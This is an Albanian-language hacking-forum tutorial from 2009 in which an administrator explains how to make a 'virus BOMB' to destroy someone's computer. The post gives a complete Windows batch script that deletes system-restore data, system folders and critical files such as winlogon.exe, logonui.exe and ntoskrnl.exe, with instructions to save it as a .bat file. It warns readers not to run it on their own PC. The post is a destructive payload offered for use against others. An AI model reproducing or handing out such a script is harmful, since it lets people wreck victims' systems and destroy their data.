E Hën, 27.05.19, 6:05 AM
Shqipet - Hack MainRegistrationLogin
Welcome Mysafir | RSS
[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Forum moderator: nicky  
Forum » Panelli i Kontrollit » Tutorials & Mësime » bere nje virus te madh BOMB qe mund tja shkatroni naj kujt p
bere nje virus te madh BOMB qe mund tja shkatroni naj kujt p
shqipet-hackDate: E Premte, 06.02.09, 7:04 PM | Message # 1
Admin
Group: Administrators
Messages: 1552
Reputation: 0
Status: Jo ne Qasje
SE PARI HAPIM NJE TEXT DOKUMENT ne kete menyr START/ALL PROGRAMS/ACCESSORIES/NOTEPAD
NE TE SHENOJM KETE TEXT:
@echo off
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore\"
del "winlogon.exe"
del "C:\windows\system32\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrnl.exe"

pasi te keni kryer kete me ne fund dhe me kryesorja esht qe ky document te ruhet ne kete format: emri.bat
p.sh. adorable-b.bat
RREZIK MOS E HAPNI KETE NE PC TUAJ SE MUND TE UA SHKATRROJ PC PER GJDO GJE QE JU NDODH PC SUAJ UNE NUK JAM PERGJEGJES.

 
Forum » Panelli i Kontrollit » Tutorials & Mësime » bere nje virus te madh BOMB qe mund tja shkatroni naj kujt p
  • Page 1 of 1
  • 1
Search:

Copyright MyCorp © 2019